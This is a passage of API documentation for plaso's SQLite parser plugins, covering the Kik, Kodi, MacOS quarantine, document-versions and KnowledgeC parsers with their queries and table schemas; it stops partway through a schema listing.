SCHEMAS = [{'_SqliteDatabaseProperties': 'CREATE TABLE _SqliteDatabaseProperties (key TEXT, value TEXT, UNIQUE(key))', 'attachment': 'CREATE TABLE attachment (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, created_date INTEGER DEFAULT 0, start_date INTEGER DEFAULT 0, filename TEXT, uti TEXT, mime_type TEXT, transfer_state INTEGER DEFAULT 0, is_outgoing INTEGER DEFAULT 0, user_info BLOB, transfer_name TEXT, total_bytes INTEGER DEFAULT 0)', 'chat': 'CREATE TABLE chat (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, style INTEGER, state INTEGER, account_id TEXT, properties BLOB, chat_identifier TEXT, service_name TEXT, room_name TEXT, account_login TEXT, is_archived INTEGER DEFAULT 0, last_addressed_handle TEXT, display_name TEXT, group_id TEXT, is_filtered INTEGER, successful_query INTEGER)', 'chat_handle_join': 'CREATE TABLE chat_handle_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, handle_id INTEGER REFERENCES handle (ROWID) ON DELETE CASCADE, UNIQUE(chat_id, handle_id))', 'chat_message_join': 'CREATE TABLE chat_message_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, PRIMARY KEY (chat_id, message_id))', 'deleted_messages': 'CREATE TABLE deleted_messages (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, guid TEXT NOT NULL)', 'handle': 'CREATE TABLE handle (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, id TEXT NOT NULL, country TEXT, service TEXT NOT NULL, uncanonicalized_id TEXT, UNIQUE (id, service) )', 'message': 'CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, text TEXT, replace INTEGER DEFAULT 0, service_center TEXT, handle_id INTEGER DEFAULT 0, subject TEXT, country TEXT, attributedBody BLOB, version INTEGER DEFAULT 0, type INTEGER DEFAULT 0, service TEXT, account TEXT, account_guid TEXT, error INTEGER DEFAULT 0, date INTEGER, date_read INTEGER, date_delivered INTEGER, is_delivered INTEGER DEFAULT 0, is_finished INTEGER DEFAULT 0, is_emote INTEGER DEFAULT 0, is_from_me INTEGER DEFAULT 0, is_empty INTEGER DEFAULT 0, is_delayed INTEGER DEFAULT 0, is_auto_reply INTEGER DEFAULT 0, is_prepared INTEGER DEFAULT 0, is_read INTEGER DEFAULT 0, is_system_message INTEGER DEFAULT 0, is_sent INTEGER DEFAULT 0, has_dd_results INTEGER DEFAULT 0, is_service_message INTEGER DEFAULT 0, is_forward INTEGER DEFAULT 0, was_downgraded INTEGER DEFAULT 0, is_archive INTEGER DEFAULT 0, cache_has_attachments INTEGER DEFAULT 0, cache_roomnames TEXT, was_data_detected INTEGER DEFAULT 0, was_deduplicated INTEGER DEFAULT 0, is_audio_message INTEGER DEFAULT 0, is_played INTEGER DEFAULT 0, date_played INTEGER, item_type INTEGER DEFAULT 0, other_handle INTEGER DEFAULT 0, group_title TEXT, group_action_type INTEGER DEFAULT 0, share_status INTEGER DEFAULT 0, share_direction INTEGER DEFAULT 0, is_expirable INTEGER DEFAULT 0, expire_state INTEGER DEFAULT 0, message_action_type INTEGER DEFAULT 0, message_source INTEGER DEFAULT 0)', 'message_attachment_join': 'CREATE TABLE message_attachment_join (message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, attachment_id INTEGER REFERENCES attachment (ROWID) ON DELETE CASCADE, UNIQUE(message_id, attachment_id))'}]

plaso.parsers.sqlite_plugins.interface module

Interface for SQLite database file parser plugins.

class plaso.parsers.sqlite_plugins.interface.SQLitePluginBases: plaso.parsers.plugins.BasePlugin

SQLite parser plugin.

CheckSchema(database)Checks the schema of a database with that defined in the plugin.

Parameters database (SQLiteDatabase) – database.

Returns

True if the schema of the database matches that defined by the plugin, or False if theschemas do not match or no schema is defined by the plugin.

Return type bool

DATA_FORMAT = 'SQLite database file'

NAME = 'sqlite_plugin'

Process(parser_mediator, cache=None, database=None, **unused_kwargs)Determine if this is the right plugin for this database.

This function takes a SQLiteDatabase object and compares the list of required table and column namesagainst thos in the database. If all the table and column names defined in REQUIRED_STRUCTURES arepresent in the database then this plugin is considered to be the correct plugin to produce events.

Parameters




Raises ValueError – If the database or cache value are missing.

QUERIES = []

REQUIRED_STRUCTURE = {}

REQUIRES_SCHEMA_MATCH = False

SCHEMAS = []



plaso.parsers.sqlite_plugins.kik_ios module

SQLite parser plugin for iOS Kik messenger database files.

class plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventDataBases: plaso.containers.events.EventData

Kik message event data.

bodycontent of the message.

Type str

message_statusmessage status, such as: read, unread, not sent, delivered, etc.

Type str

message_typemessage type, either Sent or Received.

Type str

usernameunique username of the sender or receiver.

Type str

DATA_TYPE = 'ios:kik:messaging'

class plaso.parsers.sqlite_plugins.kik_ios.KikIOSPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for iOS Kik messenger database files.

The OS Kik messenger database file is typically stored in: kik.sqlite

DATA_FORMAT = 'iOS Kik messenger SQLite database (kik.sqlite) file'

NAME = 'kik_messenger'

ParseMessageRow(parser_mediator, query, row, **unused_kwargs)Parses a message row.

Parameters




QUERIES = [('SELECT a.Z_PK AS id, b.ZUSERNAME, b.ZDISPLAYNAME,a.ZRECEIVEDTIMESTAMP, a.ZSTATE, a.ZTYPE, a.ZBODY FROM ZKIKMESSAGE a JOIN ZKIKUSER b ON b.ZEXTRA = a.ZUSER', 'ParseMessageRow')]

REQUIRED_STRUCTURE = {'ZKIKMESSAGE': frozenset({'ZBODY', 'ZRECEIVEDTIMESTAMP', 'ZSTATE', 'ZTYPE', 'ZUSER', 'Z_PK'}), 'ZKIKUSER': frozenset({'ZDISPLAYNAME', 'ZEXTRA', 'ZUSERNAME'})}

SCHEMAS = [{'Z_3MESSAGES': 'CREATE TABLE Z_3MESSAGES ( Z_3CHAT INTEGER, Z_5MESSAGES INTEGER, PRIMARY KEY (Z_3CHAT, Z_5MESSAGES) )', 'Z_6ADMINSINVERSE': 'CREATE TABLE Z_6ADMINSINVERSE ( Z_6ADMINS INTEGER, Z_6ADMINSINVERSE INTEGER, PRIMARY KEY (Z_6ADMINS, Z_6ADMINSINVERSE) )', 'Z_6BANSINVERSE': 'CREATE TABLE Z_6BANSINVERSE ( Z_6BANS INTEGER, Z_6BANSINVERSE INTEGER, PRIMARY KEY (Z_6BANS, Z_6BANSINVERSE) )', 'Z_6MEMBERS': 'CREATE TABLE Z_6MEMBERS ( Z_6MEMBERSINVERSE INTEGER, Z_6MEMBERS INTEGER, PRIMARY KEY (Z_6MEMBERSINVERSE, Z_6MEMBERS) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)', 'ZKIKATTACHMENT': 'CREATE TABLE ZKIKATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZRETRYCOUNT INTEGER, ZSTATE INTEGER, ZTYPE INTEGER, ZEXTRA INTEGER, ZMESSAGE INTEGER, ZLASTACCESSTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZCONTENT VARCHAR )', 'ZKIKATTACHMENTEXTRA': 'CREATE TABLE ZKIKATTACHMENTEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZATTACHMENT INTEGER, ZENCRYPTIONKEY BLOB )', 'ZKIKCHAT': 'CREATE TABLE ZKIKCHAT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZDRAFTMESSAGE INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZUSER INTEGER, ZDATEUPDATED TIMESTAMP )', 'ZKIKCHATEXTRA': 'CREATE TABLE ZKIKCHATEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHAT INTEGER, ZLASTSEENMESSAGE INTEGER, ZMUTEDTIMESTAMP TIMESTAMP )', 'ZKIKMESSAGE': 'CREATE TABLE ZKIKMESSAGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZSTATE INTEGER, ZSYSTEMSTATE INTEGER, ZTYPE INTEGER, ZCHATEXTRA INTEGER, ZDRAFTMESSAGECHAT INTEGER, ZLASTMESSAGECHAT INTEGER, ZLASTMESSAGEUSER INTEGER, ZUSER INTEGER, ZRECEIVEDTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZBODY VARCHAR, ZSTANZAID VARCHAR, ZRENDERINSTRUCTIONSET BLOB )', 'ZKIKUSER': 'CREATE TABLE ZKIKUSER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZADDRESSBOOKID INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZPRESENCE INTEGER, ZTYPE INTEGER, ZCHATUSER INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZDISPLAYNAME VARCHAR, ZDISPLAYNAMEASCII VARCHAR, ZEMAIL VARCHAR, ZFIRSTNAME VARCHAR, ZGROUPTAG VARCHAR, ZJID VARCHAR, ZLASTNAME VARCHAR, ZPPTIMESTAMP VARCHAR, ZPPURL VARCHAR, ZSTATUS VARCHAR, ZUSERNAME VARCHAR, ZCONTENTLINKSPROTODATA BLOB )', 'ZKIKUSEREXTRA': 'CREATE TABLE ZKIKUSEREXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZLOCALFLAGS INTEGER, ZUSER INTEGER, ZPUBLICMESSAGINGKEY BLOB )'}]



plaso.parsers.sqlite_plugins.kodi module

SQLite parser plugin for Kodi videos database files.

class plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Kodi videos database files.

The Kodi videos database file is typically stored in: MyVideos.db

DATA_FORMAT = 'Kodi videos SQLite database (MyVideos.db) file'

NAME = 'kodi'

ParseVideoRow(parser_mediator, query, row, **unused_kwargs)Parses a Video row.

Parameters




QUERIES = [('SELECT idFile, strFilename, playCount, lastPlayed FROM files', 'ParseVideoRow')]

REQUIRED_STRUCTURE = {'files': frozenset({'idFile', 'lastPlayed', 'playCount', 'strFilename'})}

SCHEMAS = [{'actor': 'CREATE TABLE actor ( actor_id INTEGER PRIMARY KEY, name TEXT, art_urls TEXT )', 'actor_link': 'CREATE TABLE actor_link(actor_id INTEGER, media_id INTEGER, media_type TEXT, role TEXT, cast_order INTEGER)', 'art': 'CREATE TABLE art(art_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, type TEXT, url TEXT)', 'bookmark': 'CREATE TABLE bookmark ( idBookmark integer primary key, idFile integer, timeInSeconds double, totalTimeInSeconds double, thumbNailImage text, player text, playerState text, type integer)', 'country': 'CREATE TABLE country ( country_id integer primary key, name TEXT)', 'country_link': 'CREATE TABLE country_link (country_id integer, media_id integer, media_type TEXT)', 'director_link': 'CREATE TABLE director_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)', 'episode': 'CREATE TABLE episode ( idEpisode integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 varchar(24),c13 varchar(24),c14 text,c15 text,c16 text,c17 varchar(24),c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idShow integer, userrating integer, idSeason integer)', 'files': 'CREATE TABLE files ( idFile integer primary key, idPath integer, strFilename text, playCount integer, lastPlayed text, dateAdded text)', 'genre': 'CREATE TABLE genre ( genre_id integer primary key, name TEXT)', 'genre_link': 'CREATE TABLE genre_link (genre_id integer, media_id integer, media_type TEXT)', 'movie': 'CREATE TABLE movie ( idMovie integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idSet integer, userrating integer, premiered text)', 'movielinktvshow': 'CREATE TABLE movielinktvshow ( idMovie integer, IdShow integer)', 'musicvideo': 'CREATE TABLE musicvideo ( idMVideo integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, premiered text)', 'path': 'CREATE TABLE path ( idPath integer primary key, strPath text, strContent text, strScraper text, strHash text, scanRecursive integer, useFolderNames bool, strSettings text, noUpdate bool, exclude bool, dateAdded text, idParentPath integer)', 'rating': 'CREATE TABLE rating (rating_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, rating_type TEXT, rating FLOAT, votes INTEGER)', 'seasons': 'CREATE TABLE seasons ( idSeason integer primary key, idShow integer, season integer, name text, userrating integer)', 'sets': 'CREATE TABLE sets ( idSet integer primary key, strSet text, strOverview text)', 'settings': 'CREATE TABLE settings ( idFile integer, Deinterlace bool,ViewMode integer,ZoomAmount float, PixelRatio float, VerticalShift float, AudioStream integer, SubtitleStream integer,SubtitleDelay float, SubtitlesOn bool, Brightness float, Contrast float, Gamma float,VolumeAmplification float, AudioDelay float, OutputToAllSpeakers bool, ResumeTime integer,Sharpness float, NoiseReduction float, NonLinStretch bool, PostProcess bool,ScalingMethod integer, DeinterlaceMode integer, StereoMode integer, StereoInvert bool, VideoStream integer)', 'stacktimes': 'CREATE TABLE stacktimes (idFile integer, times text)', 'streamdetails': 'CREATE TABLE streamdetails (idFile integer, iStreamType integer, strVideoCodec text, fVideoAspect float, iVideoWidth integer, iVideoHeight integer, strAudioCodec text, iAudioChannels integer, strAudioLanguage text, strSubtitleLanguage text, iVideoDuration integer, strStereoMode text, strVideoLanguage text)', 'studio': 'CREATE TABLE studio ( studio_id integer primary key, name TEXT)', 'studio_link': 'CREATE TABLE studio_link (studio_id integer, media_id integer, media_type TEXT)', 'tag': 'CREATE TABLE tag (tag_id integer primary key, name TEXT)', 'tag_link': 'CREATE TABLE tag_link (tag_id integer, media_id integer, media_type TEXT)', 'tvshow': 'CREATE TABLE tvshow ( idShow integer primary key,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, duration INTEGER)', 'tvshowlinkpath': 'CREATE TABLE tvshowlinkpath (idShow integer, idPath integer)', 'uniqueid': 'CREATE TABLE uniqueid (uniqueid_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, value TEXT, type TEXT)', 'version': 'CREATE TABLE version (idVersion integer, iCompressCount integer)', 'writer_link': 'CREATE TABLE writer_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)'}]

class plaso.parsers.sqlite_plugins.kodi.KodiVideoEventDataBases: plaso.containers.events.EventData

Kodi video event data.

filenamevideo filename.

Type str

play_countnumber of times the video has been played.

Type int

DATA_TYPE = 'kodi:videos:viewing'

plaso.parsers.sqlite_plugins.ls_quarantine module

SQLite parser plugin for MacOS LS quarantine events database files.

class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventDataBases: plaso.containers.events.EventData

MacOS launch services quarantine event data.

datadata.

Type bytes



urloriginal URL of the file.

Type str

user_agentuser agent that was used to download the file.

Type str

DATA_TYPE = 'macosx:lsquarantine'

class plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS LS quarantine events database files.

The MacOS launch services (LS) quarantine database file is typically stored in:/Users/<username>/Library/Preferences/

QuarantineEvents.com.apple.LaunchServices

DATA_FORMAT = 'MacOS launch services quarantine events database SQLite database file'

NAME = 'ls_quarantine'

ParseLSQuarantineRow(parser_mediator, query, row, **unused_kwargs)Parses a launch services quarantine event row.

Parameters




QUERIES = [('SELECT LSQuarantineTimestamp AS Time, LSQuarantineAgentName AS Agent, LSQuarantineOriginURLString AS URL, LSQuarantineDataURLString AS Data FROM LSQuarantineEvent ORDER BY Time', 'ParseLSQuarantineRow')]

REQUIRED_STRUCTURE = {'LSQuarantineEvent': frozenset({'LSQuarantineAgentName', 'LSQuarantineDataURLString', 'LSQuarantineOriginURLString', 'LSQuarantineTimestamp'})}

SCHEMAS = [{'LSQuarantineEvent': 'CREATE TABLE LSQuarantineEvent ( LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL, LSQuarantineTimeStamp REAL, LSQuarantineAgentBundleIdentifier TEXT, LSQuarantineAgentName TEXT, LSQuarantineDataURLString TEXT, LSQuarantineSenderName TEXT, LSQuarantineSenderAddress TEXT, LSQuarantineTypeNumber INTEGER, LSQuarantineOriginTitle TEXT, LSQuarantineOriginURLString TEXT, LSQuarantineOriginAlias BLOB )'}]

plaso.parsers.sqlite_plugins.mac_document_versions module

SQLite parser plugin for MacOS document revision database files.

class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventDataBases: plaso.containers.events.EventData

MacOS document revision event data.

namename of the original file.

Type str

pathpath from the original file.

Type str

version_pathpath to the version copy of the original file.



Type str

last_timethe system user ID of the user that opened the file.

Type str

user_sididentification user ID that open the file.

Type str

DATA_TYPE = 'mac:document_versions:file'

class plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS document revision database files.

DATA_FORMAT = 'MacOS document revisions SQLite database file'

DocumentVersionsRow(parser_mediator, query, row, **unused_kwargs)Parses a document versions row.

Parameters




NAME = 'mac_document_versions'

QUERIES = [('SELECT f.file_name AS name, f.file_path AS path, f.file_last_seen AS last_time, g.generation_path AS version_path, g.generation_add_time AS version_time FROM files f, generations g WHERE f.file_storage_id = g.generation_storage_id;', 'DocumentVersionsRow')]

REQUIRED_STRUCTURE = {'files': frozenset({'file_last_seen', 'file_name', 'file_path', 'file_storage_id'}), 'generations': frozenset({'generation_add_time', 'generation_path', 'generation_storage_id'})}

ROOT_VERSION_PATH = '/.DocumentRevisions-V100/'

SCHEMAS = [{'files': 'CREATE TABLE files (file_row_id INTEGER PRIMARY KEY ASC, file_name TEXT, file_parent_id INTEGER, file_path TEXT, file_inode INTEGER, file_last_seen INTEGER NOT NULL DEFAULT 0, file_status INTEGER NOT NULL DEFAULT 1, file_storage_id INTEGER NOT NULL)', 'generations': 'CREATE TABLE generations (generation_id INTEGER PRIMARY KEY ASC, generation_storage_id INTEGER NOT NULL, generation_name TEXT NOT NULL, generation_client_id TEXT NOT NULL, generation_path TEXT UNIQUE, generation_options INTEGER NOT NULL DEFAULT 1, generation_status INTEGER NOT NULL DEFAULT 1, generation_add_time INTEGER NOT NULL DEFAULT 0, generation_size INTEGER NOT NULL DEFAULT 0, generation_prunable INTEGER NOT NULL DEFAULT 0)', 'storage': 'CREATE TABLE storage (storage_id INTEGER PRIMARY KEY ASC AUTOINCREMENT, storage_options INTEGER NOT NULL DEFAULT 1, storage_status INTEGER NOT NULL DEFAULT 1)'}]

plaso.parsers.sqlite_plugins.mac_knowledgec module

SQLite parser plugin for MacOS Duet/KnowledgeC database files.

class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventDataBases: plaso.containers.events.EventData

KnowledgeC application execution event data.

bundle_identifierbundle identifier of the application.

Type str

durationduration of the activity.

Type int

DATA_TYPE = 'mac:knowledgec:application'



class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS Duet/KnowledgeC database files.

DATA_FORMAT = 'MacOS Duet / KnowledgeC SQLites database file'

KnowledgeCRow(parser_mediator, query, row, **unused_kwargs)Parses KnowledgeC application activity

Parameters




NAME = 'mac_knowledgec'

QUERIES = [('\n SELECT\n ZOBJECT.ZCREATIONDATE AS "entry_creation", \n ZOBJECT.ZSTARTDATE AS "start", \n ZOBJECT.ZENDDATE AS "end",\n ZOBJECT.ZSTREAMNAME AS "action",\n ZOBJECT.ZVALUESTRING AS "zvaluestring",\n ZSTRUCTUREDMETADATA.Z_DKSAFARIHISTORYMETADATAKEY__TITLE AS "title"\n FROM ZOBJECT\n LEFT JOIN ZSTRUCTUREDMETADATA \n ON ZOBJECT.ZSTRUCTUREDMETADATA = ZSTRUCTUREDMETADATA.Z_PK\n ', 'KnowledgeCRow')]

REQUIRED_STRUCTURE = {'ZOBJECT': frozenset({'ZCREATIONDATE', 'ZENDDATE', 'ZSTARTDATE', 'ZSTREAMNAME', 'ZVALUESTRING'}), 'ZSTRUCTUREDMETADATA': frozenset({'Z_DKSAFARIHISTORYMETADATAKEY__TITLE'})}

SCHEMAS = [{'ACHANGE': 'CREATE TABLE ACHANGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHANGETYPE INTEGER, ZENTITY INTEGER, ZENTITYPK INTEGER, ZTRANSACTIONID INTEGER, ZCOLUMNS BLOB, ZTOMBSTONE0 BLOB, ZTOMBSTONE1 BLOB, ZTOMBSTONE2 BLOB )', 'ATRANSACTION': 'CREATE TABLE ATRANSACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZTIMESTAMP FLOAT, ZAUTHOR VARCHAR, ZBUNDLEID VARCHAR, ZCONTEXTNAME VARCHAR, ZPROCESSID VARCHAR, ZQUERYGEN BLOB )', 'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCOUNT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZSTRINGVALUE VARCHAR )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z8_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z8_OBJECT INTEGER, ZSUBJECT INTEGER, Z8_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_DKSUNRISESUNSETMETADATAKEY__ISDAYLIGHT INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__CURRENTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNRISE TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__NEXTSUNSET TIMESTAMP, Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNRISE TIMESTAMP, 